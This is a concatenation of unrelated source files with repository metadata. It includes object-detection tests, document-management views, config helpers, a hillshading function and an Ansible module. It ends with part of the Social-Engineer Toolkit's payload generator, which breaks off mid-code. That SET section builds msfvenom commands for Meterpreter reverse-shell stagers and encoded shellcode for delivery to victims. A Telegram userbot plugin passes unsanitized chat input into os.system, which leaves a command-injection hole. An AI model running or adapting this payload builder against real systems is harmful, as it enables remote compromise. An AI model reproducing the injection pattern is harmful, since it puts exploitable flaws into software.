detector.train() gt_bboxes = mm_inputs['gt_bboxes'] gt_labels = mm_inputs['gt_labels'] losses = detector.forward( imgs, img_metas, gt_bboxes=gt_bboxes, gt_labels=gt_labels, return_loss=True) assert isinstance(losses, dict) loss, _ = detector._parse_losses(losses) assert float(loss.item()) > 0 # Test forward train with an empty truth batch mm_inputs = _demo_mm_inputs(input_shape, num_items=[0]) imgs = mm_inputs.pop('imgs') img_metas = mm_inputs.pop('img_metas') gt_bboxes = mm_inputs['gt_bboxes'] gt_labels = mm_inputs['gt_labels'] losses = detector.forward( imgs, img_metas, gt_bboxes=gt_bboxes, gt_labels=gt_labels, return_loss=True) assert isinstance(losses, dict) loss, _ = detector._parse_losses(losses) assert float(loss.item()) > 0 # Test forward test detector.eval() with torch.no_grad(): img_list = [g[None, :] for g in imgs] batch_results = [] for one_img, one_meta in zip(img_list, img_metas): result = detector.forward([one_img], [[one_meta]], rescale=True, return_loss=False) batch_results.append(result) def test_inference_detector(): from mmdet.apis import inference_detector from mmdet.models import build_detector from mmcv import ConfigDict # small RetinaNet num_class = 3 model_dict = dict( type='RetinaNet', backbone=dict( type='ResNet', depth=18, num_stages=4, out_indices=(3, ), norm_cfg=dict(type='BN', requires_grad=False), norm_eval=True, style='pytorch'), neck=None, bbox_head=dict( type='RetinaHead', num_classes=num_class, in_channels=512, stacked_convs=1, feat_channels=256, anchor_generator=dict( type='AnchorGenerator', octave_base_scale=4, scales_per_octave=3, ratios=[0.5], strides=[32]), bbox_coder=dict( type='DeltaXYWHBBoxCoder', target_means=[.0, .0, .0, .0], target_stds=[1.0, 1.0, 1.0, 1.0]), ), test_cfg=dict( nms_pre=1000, min_bbox_size=0, score_thr=0.05, nms=dict(type='nms', iou_threshold=0.5), max_per_img=100)) rng = np.random.RandomState(0) img1 = rng.rand(100, 100, 3) img2 = rng.rand(100, 100, 3) model = build_detector(ConfigDict(model_dict)) config = _get_config_module('retinanet/retinanet_r50_fpn_1x_coco.py') model.cfg = config # test single image result = inference_detector(model, img1) assert len(result) == num_class # test multiple image result = inference_detector(model, [img1, img2]) assert len(result) == 2 and len(result[0]) == num_class
34.173107
111
0.604568
5256fc7c6d0c5384aabe91d5ebf9201c1f38571a
6,449
py
Python
mayan/apps/document_parsing/views.py
Syunkolee9891/Mayan-EDMS
3759a9503a264a180b74cc8518388f15ca66ac1a
[ "Apache-2.0" ]
1
2021-06-17T18:24:25.000Z
2021-06-17T18:24:25.000Z
mayan/apps/document_parsing/views.py
Syunkolee9891/Mayan-EDMS
3759a9503a264a180b74cc8518388f15ca66ac1a
[ "Apache-2.0" ]
6
2020-06-05T22:45:29.000Z
2022-03-11T23:57:53.000Z
mayan/apps/document_parsing/views.py
Syunkolee9891/Mayan-EDMS
3759a9503a264a180b74cc8518388f15ca66ac1a
[ "Apache-2.0" ]
null
null
null
from __future__ import absolute_import, unicode_literals from django.contrib import messages from django.http import HttpResponseRedirect from django.shortcuts import get_object_or_404 from django.urls import reverse_lazy from django.utils.translation import ugettext_lazy as _, ungettext from mayan.apps.common.generics import ( FormView, MultipleObjectConfirmActionView, SingleObjectDetailView, SingleObjectDownloadView, SingleObjectEditView, SingleObjectListView ) from mayan.apps.common.mixins import ExternalObjectMixin from mayan.apps.documents.forms import DocumentTypeFilteredSelectForm from mayan.apps.documents.models import Document, DocumentPage, DocumentType from .forms import DocumentContentForm, DocumentPageContentForm from .models import DocumentVersionParseError from .permissions import ( permission_content_view, permission_document_type_parsing_setup, permission_parse_document ) from .utils import get_document_content class DocumentContentView(SingleObjectDetailView): form_class = DocumentContentForm model = Document object_permission = permission_content_view def dispatch(self, request, *args, **kwargs): result = super(DocumentContentView, self).dispatch( request, *args, **kwargs ) self.get_object().add_as_recent_document_for_user(request.user) return result def get_extra_context(self): return { 'document': self.get_object(), 'hide_labels': True, 'object': self.get_object(), 'title': _('Content for document: %s') % self.get_object(), } class DocumentContentDownloadView(SingleObjectDownloadView): model = Document object_permission = permission_content_view def get_file(self): file_object = DocumentContentDownloadView.TextIteratorIO( iterator=get_document_content(document=self.get_object()) ) return DocumentContentDownloadView.VirtualFile( file=file_object, name='{}-content'.format(self.get_object()) ) class DocumentPageContentView(SingleObjectDetailView): form_class = DocumentPageContentForm model = DocumentPage object_permission = permission_content_view def dispatch(self, request, *args, **kwargs): result = super(DocumentPageContentView, self).dispatch( request, *args, **kwargs ) self.get_object().document.add_as_recent_document_for_user( request.user ) return result def get_extra_context(self): return { 'hide_labels': True, 'object': self.get_object(), 'title': _('Content for document page: %s') % self.get_object(), } class DocumentParsingErrorsListView(SingleObjectListView): view_permission = permission_content_view def get_document(self): return get_object_or_404(klass=Document, pk=self.kwargs['pk']) def get_extra_context(self): return { 'hide_object': True, 'object': self.get_document(), 'title': _( 'Parsing errors for document: %s' ) % self.get_document(), } def get_source_queryset(self): return self.get_document().latest_version.parsing_errors.all() class DocumentSubmitView(MultipleObjectConfirmActionView): model = Document object_permission = permission_parse_document success_message = _( '%(count)d document added to the parsing queue' ) success_message_plural = _( '%(count)d documents added to the parsing queue' ) def get_extra_context(self): queryset = self.object_list result = { 'title': ungettext( singular='Submit %(count)d document to the parsing queue?', plural='Submit %(count)d documents to the parsing queue', number=queryset.count() ) % { 'count': queryset.count(), } } if queryset.count() == 1: result.update( { 'object': queryset.first(), 'title': _( 'Submit document "%s" to the parsing queue' ) % queryset.first() } ) return result def object_action(self, instance, form=None): instance.submit_for_parsing() class DocumentTypeSettingsEditView(ExternalObjectMixin, SingleObjectEditView): external_object_class = DocumentType external_object_permission = permission_document_type_parsing_setup external_object_pk_url_kwarg = 'pk' fields = ('auto_parsing',) post_action_redirect = reverse_lazy(viewname='documents:document_type_list') def get_document_type(self): return self.external_object def get_extra_context(self): return { 'object': self.get_document_type(), 'title': _( 'Edit parsing settings for document type: %s.' ) % self.get_document_type() } def get_object(self, queryset=None): return self.get_document_type().parsing_settings class DocumentTypeSubmitView(FormView): extra_context = { 'title': _('Submit all documents of a type for parsing.') } form_class = DocumentTypeFilteredSelectForm post_action_redirect = reverse_lazy(viewname='common:tools_list') def get_form_extra_kwargs(self): return { 'allow_multiple': True, 'permission': permission_parse_document, 'user': self.request.user } def form_valid(self, form): count = 0 for document_type in form.cleaned_data['document_type']: for document in document_type.documents.all(): document.submit_for_parsing() count += 1 messages.success( message=_( '%(count)d documents added to the parsing queue.' ) % { 'count': count, }, request=self.request ) return HttpResponseRedirect(redirect_to=self.get_success_url()) class ParseErrorListView(SingleObjectListView): extra_context = { 'hide_object': True, 'title': _('Parsing errors'), } view_permission = permission_document_type_parsing_setup def get_source_queryset(self): return DocumentVersionParseError.objects.all()
31.768473
80
0.656071
05909b7544b41abb1abf7245f32aa48b1ecd21b7
8,268
py
Python
workflow_configuraitons_manager/xml_parsers/variables_manager.py
sontheimer/EBRAINS_ConfigManager
5bbd8ee048e33d154d7287512d65bdcf2ca1a7d9
[ "BSD-3-Clause" ]
null
null
null
workflow_configuraitons_manager/xml_parsers/variables_manager.py
sontheimer/EBRAINS_ConfigManager
5bbd8ee048e33d154d7287512d65bdcf2ca1a7d9
[ "BSD-3-Clause" ]
null
null
null
workflow_configuraitons_manager/xml_parsers/variables_manager.py
sontheimer/EBRAINS_ConfigManager
5bbd8ee048e33d154d7287512d65bdcf2ca1a7d9
[ "BSD-3-Clause" ]
null
null
null
# ------------------------------------------------------------------------------ # Copyright 2020 Forschungszentrum Jülich GmbH and Aix-Marseille Université # "Licensed to the Apache Software Foundation (ASF) under one or more contributor # license agreements; and to You under the Apache License, Version 2.0. " # # Forschungszentrum Jülich # Institute: Institute for Advanced Simulation (IAS) # Section: Jülich Supercomputing Centre (JSC) # Division: High Performance Computing in Neuroscience # Laboratory: Simulation Laboratory Neuroscience # Team: Multi-scale Simulation and Design # # ------------------------------------------------------------------------------ # Co-Simulator Imports from EBRAINS_ConfigManager.workflow_configuraitons_manager.xml_parsers import enums from EBRAINS_ConfigManager.workflow_configuraitons_manager.xml_parsers import variables from EBRAINS_ConfigManager.workflow_configuraitons_manager.xml_parsers import constants from EBRAINS_ConfigManager.workflow_configuraitons_manager.xml_parsers import exceptions from EBRAINS_ConfigManager.workflow_configuraitons_manager.xml_parsers import utils class VariablesManager(object): """ Manages the variables related to the run-time environment """ __logger = None def __init__(self, logger=None): self.__logger = logger self.__dict = { # Actions XML files location variables.CO_SIM_ACTIONS_DIR: { constants.CO_SIM_VARIABLE_DESCRIPTION: 'Path to actions XML files', constants.CO_SIM_VARIABLE_VALUE: None}, # Empty, TO BE USED AS A FAKE VALUE variables.CO_SIM_EMPTY: { constants.CO_SIM_VARIABLE_DESCRIPTION: 'empty string', constants.CO_SIM_VARIABLE_VALUE: ''}, # Execution Environment <Local|Cluster> variables.CO_SIM_EXECUTION_ENVIRONMENT: { constants.CO_SIM_VARIABLE_DESCRIPTION: 'Co-Simulator Execution Environment', constants.CO_SIM_VARIABLE_VALUE: None}, # Results Output Directory variables.CO_SIM_RESULTS_DIR: { constants.CO_SIM_VARIABLE_DESCRIPTION: 'Results files directory location', constants.CO_SIM_VARIABLE_VALUE: None}, # Routines Directory Path variables.CO_SIM_ROUTINES_DIR: { constants.CO_SIM_VARIABLE_DESCRIPTION: 'Co-Simulation Routines directory location', constants.CO_SIM_VARIABLE_VALUE: None}, } def get_value(self, variable_name=None): """ :param variable_name: The environment variable name which the value is being gotten (requested) :return: The value of the passed variable name """ return self.__dict[variable_name][constants.CO_SIM_VARIABLE_VALUE] def set_value(self, variable_name=None, variable_value=None): """ :param variable_value: :param variable_name: :return: """ try: self.__dict[variable_name][constants.CO_SIM_VARIABLE_VALUE] = variable_value except KeyError: self.__logger.error('{} has not been declared in the variable manager yet'.format(variable_name)) raise exceptions.CoSimVariableNotFound(co_sim_variable_name=variable_name) return None return self.__dict[variable_name] def set_co_sim_variable_values_from_variables_dict(self, variables_dictionary_source=None): """ :param variables_dictionary_source: Dictionary containing Co-Simulation Variables (CO_SIM_*) :return: """ for key, value in variables_dictionary_source.items(): try: self.__dict[key][constants.CO_SIM_VARIABLE_VALUE] = value except KeyError: self.__logger.error('{} is not a defined Co-Simulator variable'.format(key)) return enums.VariablesReturnCodes.VARIABLE_NOT_OK return enums.VariablesReturnCodes.VARIABLE_OK def create_variables_from_parameters_dict(self, input_dictionary=None): """ Transforms the referenced variables names into its values based on CO_SIM_* variables. CO_SIM_* variables are those referencing a value in the same XML configuration file. e.g. CO_SIM_RUNTIME_RESULTS_DIR -> represents the output path where the results files will be written/read. and could be referenced as follows: <var_186> <var_name>CO_SIM_VISUALIZATION_FILES_OUTPUT_PATH</var_name> <var_value>CO_SIM_RUNTIME_RESULTS_DIR/visualizer</var_value> </var_186> Environment variables are those defined on the system where the Co-Simulation process is being run. e.g. ${CO_SIM_TVB_NEST_PATH} -> represents the path where the TVB_NEST repository is located. and could be referenced as follows: <var_194> <var_name>CO_SIM_XML_ACTIONS_DIR</var_name> <var_value>${CO_SIM_TVB_NEST_PATH}/co_simulator/actions</var_value> </var_194> :param input_dictionary: The private attribute object reference of the dictionary where the variables will be transformed into its values :return: XML_OK: All the referenced variables in the dictionary where properly interchanged by its values XML_CO_SIM_VARIABLE_ERROR: The value for a referenced variable could not been obtained """ for key, value in input_dictionary.items(): # transforming the CO_SIM_ references into its values try: runtime_variable_value = \ utils.transform_co_simulation_variables_into_values(variables_manager=self, functional_variable_value=value) except exceptions.CoSimVariableNotFound as CoSimVariableNotFound: self.__logger.error(CoSimVariableNotFound) # return enums.XmlManagerReturnCodes.XML_CO_SIM_VARIABLE_ERROR return enums.ParametersReturnCodes.VARIABLE_NOT_FOUND # creating the new CO_SIM_ variable self.__dict[key] = {constants.CO_SIM_VARIABLE_DESCRIPTION: 'created on run time', constants.CO_SIM_VARIABLE_VALUE: runtime_variable_value} return enums.ParametersReturnCodes.PARAMETER_OK def create_co_sim_run_time_variables(self, action_plan_variables_dict=None, action_plan_parameters_dict=None): """ Sets RUN TIME Co-Simulation variables based on the content of the variables and parameters set on the Action Plan XML file :return: VARIABLE_OK """ # CO_SIM_LAUNCHER try: execution_environment = \ self.__dict[variables.CO_SIM_EXECUTION_ENVIRONMENT][constants.CO_SIM_VARIABLE_VALUE] except KeyError: self.__logger.error('{} has not been set yet'.format(variables.CO_SIM_EXECUTION_ENVIRONMENT)) return enums.VariablesReturnCodes.VARIABLE_NOT_OK else: if execution_environment.upper() == 'LOCAL': self.__dict[variables.CO_SIM_LAUNCHER] = \ {constants.CO_SIM_VARIABLE_DESCRIPTION: 'launcher created on run time', constants.CO_SIM_VARIABLE_VALUE: 'mpirun'} elif execution_environment.upper() == 'CLUSTER': self.__dict[variables.CO_SIM_LAUNCHER] = \ {constants.CO_SIM_VARIABLE_DESCRIPTION: 'launcher created on run time', constants.CO_SIM_VARIABLE_VALUE: 'srun'} else: self.__logger.error('{} wrong value set. <LOCAL|CLUSTER>'.format( variables.CO_SIM_EXECUTION_ENVIRONMENT)) return enums.VariablesReturnCodes.VARIABLE_NOT_OK return enums.VariablesReturnCodes.VARIABLE_OK
47.791908
114
0.641509
5a66fcb717c3a9151664741a2074a7f2373f4788
383
py
Python
project/e2c/asgi.py
Tanukium/excel2csv
44afc6d4ca241f48e12583e6c1209d881f466f49
[ "MIT" ]
9
2019-01-12T04:19:27.000Z
2019-03-26T15:22:32.000Z
project/e2c/asgi.py
Tanukium/msemi
40da6c4942cfffda31ba302ac0b8e6f8be2e86e4
[ "MIT" ]
1
2021-04-13T18:40:08.000Z
2021-04-13T18:40:08.000Z
project/e2c/asgi.py
Tanukium/msemi
40da6c4942cfffda31ba302ac0b8e6f8be2e86e4
[ "MIT" ]
null
null
null
""" ASGI config for e2c project. It exposes the ASGI callable as a module-level variable named ``application``. For more information on this file, see https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/ """ import os from django.core.asgi import get_asgi_application os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'e2c.settings') application = get_asgi_application()
22.529412
78
0.780679
b80ef368c958247ba1870cccbf0f4c08d067bec7
1,461
py
Python
userbot/modules/instamusic.py
PratikGoswamiPM/OpenUserBot
1ba7845522a5d5619d2705421a303aa82ce35abb
[ "Naumen", "Condor-1.1", "MS-PL" ]
1
2021-07-18T06:57:28.000Z
2021-07-18T06:57:28.000Z
userbot/modules/instamusic.py
PratikGoswamiPM/OpenUserBot
1ba7845522a5d5619d2705421a303aa82ce35abb
[ "Naumen", "Condor-1.1", "MS-PL" ]
null
null
null
userbot/modules/instamusic.py
PratikGoswamiPM/OpenUserBot
1ba7845522a5d5619d2705421a303aa82ce35abb
[ "Naumen", "Condor-1.1", "MS-PL" ]
null
null
null
# Originally from Bothub # Port to UserBot by @PM_The_Angry from telethon import events import subprocess from telethon.errors import MessageEmptyError, MessageTooLongError, MessageNotModifiedError import io import asyncio import time #from userbot.utils import admin_cmd from userbot.events import register from userbot import bot, CMD_HELP import glob import os try: import instantmusic , subprocess except: os.system("pip install instantmusic") os.system("rm -rf *.mp3") def bruh(name): os.system("instantmusic -q -s "+name) @register(outgoing=True, pattern="^.song(?: |$)(.*)") async def _(event): if event.fwd_from: return DELAY_BETWEEN_EDITS = 0.3 PROCESS_RUN_TIME = 100 cmd = event.pattern_match.group(1) reply_to_id = event.message.id if event.reply_to_msg_id: reply_to_id = event.reply_to_msg_id await event.edit("searching song..please wait") bruh(str(cmd)) l = glob.glob("*.mp3") loa = l[0] await event.edit("sending song") await bot.send_file( event.chat_id, loa, force_document=True, allow_cache=False, caption=cmd, reply_to=reply_to_id ) os.system("rm -rf *.mp3") subprocess.check_output("rm -rf *.mp3",shell=True) CMD_HELP.update({ "instamusic": ".song <songname>" "\nUsage: For searching songs.\n" })
23.564516
91
0.640657
68ed8bad0fbcb080d3932f731bc01ab9ad6ac8bc
2,532
py
Python
lms_code/plots/shading.py
tbenthompson/LMS_public
1637e461ea269ae127a9da1fdba8e47a180c2ed2
[ "MIT" ]
null
null
null
lms_code/plots/shading.py
tbenthompson/LMS_public
1637e461ea269ae127a9da1fdba8e47a180c2ed2
[ "MIT" ]
null
null
null
lms_code/plots/shading.py
tbenthompson/LMS_public
1637e461ea269ae127a9da1fdba8e47a180c2ed2
[ "MIT" ]
null
null
null
from pylab import * # Taken from http://rnovitsky.blogspot.com/2010/04/using-hillshade-image-as-intensity.html def set_shade(a,intensity=None,cmap=cm.jet,scale=10.0,azdeg=165.0,altdeg=45.0): ''' sets shading for data array based on intensity layer or the data's value itself. inputs: a - a 2-d array or masked array intensity - a 2-d array of same size as a (no chack on that) representing the intensity layer. if none is given the data itself is used after getting the hillshade values see hillshade for more details. cmap - a colormap (e.g matplotlib.colors.LinearSegmentedColormap instance) scale,azdeg,altdeg - parameters for hilshade function see there for more details output: rgb - an rgb set of the Pegtop soft light composition of the data and intensity can be used as input for imshow() based on ImageMagick's Pegtop_light: http://www.imagemagick.org/Usage/compose/#pegtoplight''' if intensity is None: # hilshading the data intensity = hillshade(a,scale=10.0,azdeg=165.0,altdeg=45.0) else: # or normalize the intensity intensity = (intensity - intensity.min())/(intensity.max() - intensity.min()) # get rgb of normalized data based on cmap rgb = cmap((a-a.min())/float(a.max()-a.min()))[:,:,:3] # form an rgb eqvivalent of intensity d = intensity.repeat(3).reshape(rgb.shape) # simulate illumination based on pegtop algorithm. rgb = 2*d*rgb+(rgb**2)*(1-2*d) return rgb def hillshade(data,scale=10.0,azdeg=165.0,altdeg=45.0): ''' convert data to hillshade based on matplotlib.colors.LightSource class. input: data - a 2-d array of data scale - scaling value of the data. higher number = lower gradient azdeg - where the light comes from: 0 south ; 90 east ; 180 north ; 270 west altdeg - where the light comes from: 0 horison ; 90 zenith output: a 2-d array of normalized hilshade ''' # convert alt, az to radians az = azdeg*pi/180.0 alt = altdeg*pi/180.0 # gradient in x and y directions dx, dy = gradient(data/float(scale)) slope = 0.5*pi - arctan(hypot(dx, dy)) aspect = arctan2(dx, dy) intensity = sin(alt)*sin(slope) + cos(alt)*cos(slope)*cos(-az - aspect - 0.5*pi) intensity = (intensity - intensity.min())/(intensity.max() - intensity.min()) return intensity
44.421053
90
0.639021
cf1a96ce22487299f9e15346ca4ced28f3540a43
1,989
py
Python
plugins/modules/ces_quotas_info.py
shaderecker/ansible-collection-cloud
d347379181c66db8d0c775c6f0647e928a90ba70
[ "Apache-2.0" ]
null
null
null
plugins/modules/ces_quotas_info.py
shaderecker/ansible-collection-cloud
d347379181c66db8d0c775c6f0647e928a90ba70
[ "Apache-2.0" ]
null
null
null
plugins/modules/ces_quotas_info.py
shaderecker/ansible-collection-cloud
d347379181c66db8d0c775c6f0647e928a90ba70
[ "Apache-2.0" ]
1
2021-03-24T06:03:58.000Z
2021-03-24T06:03:58.000Z
#!/usr/bin/python # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. DOCUMENTATION = ''' module: ces_quotas_info short_description: Get ressource Quotas extends_documentation_fragment: opentelekomcloud.cloud.otc version_added: "0.3.0" author: "Sebastian Gode (@SebastianGode)" description: - Get ressource Quotas requirements: ["openstacksdk", "otcextensions"] ''' RETURN = ''' quotas: description: Dictionary of Quotas returned: changed type: list sample: [ { "id": null, "name": null, "resources": [ { "id": null, "location": null, "name": null, "quota": 100, "type": "alarm", "unit": "", "used": 1 } ] } ] ''' EXAMPLES = ''' # Query Alarm Quotas - opentelekomcloud.cloud.ces_quotas_info: ''' from ansible_collections.opentelekomcloud.cloud.plugins.module_utils.otc import OTCModule class CesQuotasInfoModule(OTCModule): argument_spec = dict() def run(self): data = [] query = {} for raw in self.conn.ces.quotas(**query): dt = raw.to_dict() dt.pop('location') data.append(dt) self.exit( changed=False, quotas=data ) def main(): module = CesQuotasInfoModule() module() if __name__ == '__main__': main()
23.963855
89
0.591755
20f8582b4fe695877eb4c6608b957c6cdb526adc
40,268
py
Python
src/core/payloadgen/create_payloads.py
rockstar9788/socialtoolkit
02e40c6f89d5a78c233449c310b5d3c1e2a12e0b
[ "MIT" ]
null
null
null
src/core/payloadgen/create_payloads.py
rockstar9788/socialtoolkit
02e40c6f89d5a78c233449c310b5d3c1e2a12e0b
[ "MIT" ]
null
null
null
src/core/payloadgen/create_payloads.py
rockstar9788/socialtoolkit
02e40c6f89d5a78c233449c310b5d3c1e2a12e0b
[ "MIT" ]
null
null
null
#!/usr/bin/env python # Import modules import subprocess import time import sys import os import re import socket import base64 from src.core.setcore import * from src.core.menu.text import * from src.core.dictionaries import * try: if len(check_options("IPADDR=")) > 2: ipaddr = check_options("IPADDR=") else: ipaddr = "" except: ipaddr = "" me = mod_name() listener = "notdefined" definepath = os.getcwd() sys.path.append(definepath) port1 = "8080" port2 = "8081" operating_system = check_os() # check stage encoding - shikata ga nai for payload delivery stage_encoding = check_config("STAGE_ENCODING=").lower() if stage_encoding == "off": stage_encoding = "false" else: stage_encoding = "true" configfile = open("/etc/setoolkit/set.config", "r").readlines() # check the metasploit path msf_path = meta_path() # check the config files for all of the flags needed for the file auto_migrate = check_config("AUTO_MIGRATE=") meterpreter_multi = check_config("METERPRETER_MULTI_SCRIPT=") linux_meterpreter_multi = check_config("LINUX_METERPRETER_MULTI_SCRIPT=") meterpreter_multi_command = check_config("METERPRETER_MULTI_COMMANDS=") meterpreter_multi_command = meterpreter_multi_command.replace(";", "\n") linux_meterpreter_multi_command = check_config("LINUX_METERPRETER_MULTI_COMMANDS=") linux_meterpreter_multi_command = linux_meterpreter_multi_command.replace(";", "\n") unc_embed = check_config("UNC_EMBED=") attack_vector = 0 linosx = 0 multiattack = "" # grab attack vector if os.path.isfile(userconfigpath + "attack_vector"): fileopen = open(userconfigpath + "attack_vector", "r") for line in fileopen: line = line.rstrip() if line == "java": attack_vector = "java" if line == "multiattack": attack_vector = "multiattack" multiattack = open(userconfigpath + "multi_payload", "w") # here is a place holder for the multi attack java # multiattack outputs a file called multi_java if # this file is present it will allow additional # functionality multiattack_java = "off" if os.path.isfile(userconfigpath + "multi_java"): multiattack_java = "on" # custom payloadgen payloadgen = "regular" if os.path.isfile(userconfigpath + "payloadgen"): payloadgen = "solo" # # grab ipaddr if it hasn't been identified yet # if check_options("IPADDR=") == False: fileopen = open("/etc/setoolkit/set.config", "r") data = fileopen.read() match = re.search("AUTO_DETECT=ON", data) if match: try: ipaddr = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) ipaddr.connect(('google.com', 0)) ipaddr.settimeout(2) ipaddr = ipaddr.getsockname()[0] update_options("IPADDR=" + ipaddr) except Exception as e: log(e) ipaddr = raw_input( setprompt(["4"], "IP address for the payload listener (LHOST)")) update_options("IPADDR=" + ipaddr) # if AUTO_DETECT=OFF prompt for IP Address match = re.search("AUTO_DETECT=OFF", data) if match: ipaddr = raw_input( setprompt(["4"], "Enter the IP address for the payload (reverse)")) update_options("IPADDR=" + ipaddr) # payload selection here try: # Specify path to metasploit path = msf_path # Specify payload # this is encoding encode = "" # this is payload choice1 = "" # this is port choice3 = "" if os.path.isfile(userconfigpath + "meterpreter_reverse_tcp_exe"): fileopen = open(userconfigpath + "meterpreter_reverse_tcp_exe", "r") for line in fileopen: # this reads in the first line of the file which happens to be port # when calling through core choice3 = line.rstrip() # change attack_vector to nothing attack_vector = "" # specify payload choice1 = "windows/meterpreter/reverse_tcp" # encode using backdoored executable encode = "16" # if we don't trigger on the standard core api call if choice1 == "": # # USER INPUT: SHOW PAYLOAD MENU 1 # # debug_msg(me, "printing 'text.payload_menu_1'", 5) show_payload_menu1 = create_menu(payload_menu_1_text, payload_menu_1) choice1 = raw_input(setprompt(["4"], "")) # default blank then select pyinjector if choice1 == "": choice1 = "1" # check the length and make sure it works if choice1 != "": choice1 = check_length(choice1, 8) # convert it to a string choice1 = str(choice1) custom = 0 counter = 0 flag = 0 encode_stop = 0 # Condition testing of 'choice1' # Will use a dictionary list if choice1 == "exit": exit_set() if choice1 == '': choice1 = ("1") if choice1 == '5' or choice1 == '6' or choice1 == '7': encode_stop = 1 encode = "" if choice1 == '7': flag = 1 # here we specify shellcodeexec if choice1 == '1' or choice1 == '2' or choice1 == '6' or choice1 == '8': encode_stop = 1 encode = 0 # 11 is the set interactive shell, 12 is set rev http shell and 13 is # ratte listener if choice1 == '3' or choice1 == '4' or choice1 == "5": encoder = 'false' payloadgen = 'solo' encode_stop = 1 filewrite = open(userconfigpath + "set.payload", "w") # select setshell if choice1 == '3': filewrite.write("SETSHELL") # select setshell_reverse if choice1 == '4': filewrite.write("SETSHELL_HTTP") # select ratte if choice1 == '5': filewrite.write("RATTE") filewrite.close() if choice1 != "7": # if not then import the payload selection choice1 = ms_payload_2(choice1) # don't do courtesy shell if counter == 0: courtesyshell = ("") # if custom if choice1 == '7': print_info("Example: /root/custom.exe") choice1 = raw_input(setprompt(["4"], "Enter the path to your executable")) if not os.path.isfile(choice1): while 1: print_error("ERROR:File not found. Try Again.") choice1 = raw_input(setprompt(["4"], "Enter the path to your executable")) if os.path.isfile(choice1): break update_options("CUSTOM_EXE=%s" % (choice1)) custom = 1 # if we are using our own executable if custom == 1: check_write = open(userconfigpath + "custom.exe", "w") check_write.write("VALID") check_write.close() shutil.copyfile("%s" % (choice1), "msf.exe") shutil.copyfile("msf.exe", userconfigpath + "msf.exe") # Specify Encoding Option encoder = "false" if choice1 == "cmd/multi": update_options("CUSTOM_EXE=CMD/MULTI") # if we aren't using the set shell if choice1 != "set/reverse_shell": # we need to rewrite index.html real quick because it has a parameter # that could get confusing if os.path.isfile(userconfigpath + "web_clone/index.html"): fileopen = open(userconfigpath + "web_clone/index.html", "r") data = fileopen.read() data = data.replace("freehugs", "") os.remove(userconfigpath + "web_clone/index.html") filewrite = open(userconfigpath + "web_clone/index.html", "w") filewrite.write(data) filewrite.close() # Specify Remote Host if ipaddr.file is missing (should never get here) if check_options("IPADDR=") == 0: choice2 = raw_input(setprompt( ["4"], "IP Address of the listener/attacker (reverse) or host/victim (bind shell)")) update_options("IPADDR=" + choice2) choice2 = check_options("IPADDR=") # specify the port for the listener if choice3 == "": if choice1 != "shellcode/multipyinject": if choice1 != "cmd/multi": if custom == 0: choice3 = raw_input(setprompt(["4"], "PORT of the listener [443]")) # here we check if the user really wants to use port 80 if choice3 == "80": print_warning( "WARNING: SET Web Server requires port 80 to listen.") print_warning( "WARNING: Are you sure you want to proceed with port 80?") port_choice_option = raw_input( "\nDo you want to keep port 80? [y/n]") if port_choice_option == "n": # reprompt it choice3 = raw_input(setprompt(["4"], "PORT of listener [443]")) if choice3 == '': choice3 = '443' # this is needed for the set_payload update_options("PORT=" + choice3) # if we are using the SET interactive shell then do this if choice1 == "set/reverse_shell": encoder = "false" filewrite = open(userconfigpath + "set.payload.posix", "w") filewrite.write("true") filewrite.close() import src.core.payloadprep # if were using the multiattack option if attack_vector == "multiattack": multiattack.write("MAIN=" + str(choice3) + "\n") multiattack.write("MAINPAYLOAD=" + str(choice1) + "\n") # if encoding is required, it will place 1msf.exe first then encode it # to msf.exe if encoder == "true": choice4 = ("raw") msf_filename = ("1msf.exe") if encoder == "false": choice4 = ("exe") msf_filename = ("msf.exe") # set choice to blank for ALL PORTS scan if flag == 0: portnum = "LPORT=" + choice3 if flag == 1: portnum = "" if encode != "BACKDOOR": # if we aren't using the set reverse shell if choice1 != "set/reverse_shell": # if we are using shellcodeexec if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject": if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject": print ("\nSelect the payload you want to deliver via shellcode injection\n\n 1) Windows Meterpreter Reverse TCP\n 2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager\n 3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager\n 4) Windows Meterpreter (ALL PORTS) Reverse TCP\n") # select payload choice9 = raw_input(setprompt(["4"], "Enter the number for the payload [meterpreter_reverse_https]")) # select default meterpreter reverse tcp if choice9 == "": choice9 = "windows/meterpreter/reverse_https" if choice9 == "1": choice9 = "windows/meterpreter/reverse_tcp" # select reverse https if choice9 == "2": choice9 = "windows/meterpreter/reverse_https" # select reverse http if choice9 == "3": choice9 = "windows/meterpreter/reverse_http" # select all ports if choice9 == "4": choice9 = "windows/meterpreter/reverse_tcp_allports" if ipaddr == "": # grab ipaddr if not defined ipaddr = check_options("IPADDR=") if choice1 == "shellcode/alphanum": print_status("Generating the payload via msfvenom and generating alphanumeric shellcode...") subprocess.Popen("%smsfvenom -p %s LHOST=%s %s StagerURILength=5 StagerVerifySSLCert=false -e EXITFUNC=thread -e x86/alpha_mixed --format raw BufferRegister=EAX > %s/meterpreter.alpha_decoded" % (meta_path(), choice9, choice2, portnum, userconfigpath), shell=True).wait() if choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject" or choice1 == "cmd/multi": # here we update set options to specify pyinjection and multipy update_options("PYINJECTION=ON") # define, this will eventually be all of our payloads multipyinject_payload = "" # clean up old file if os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)): os.remove("%s/meta_config_multipyinjector" % (userconfigpath)) # remove any old payload options if os.path.isfile(userconfigpath + "payload.options.shellcode"): os.remove(userconfigpath + "payload_options.shellcode") # this is the file that gets saved with the payload and # port options if choice1 != "cmd/multi": payload_options = open(userconfigpath + "payload_options.shellcode", "a") while 1: # don't need any options here if choice1 == "cmd/multi": break if choice1 == "shellcode/multipyinject": print ("\nSelect the payload you want to deliver via shellcode injection\n\n 1) Windows Meterpreter Reverse TCP\n 2) Windows Meterpreter (Reflective Injection), Reverse HTTPS 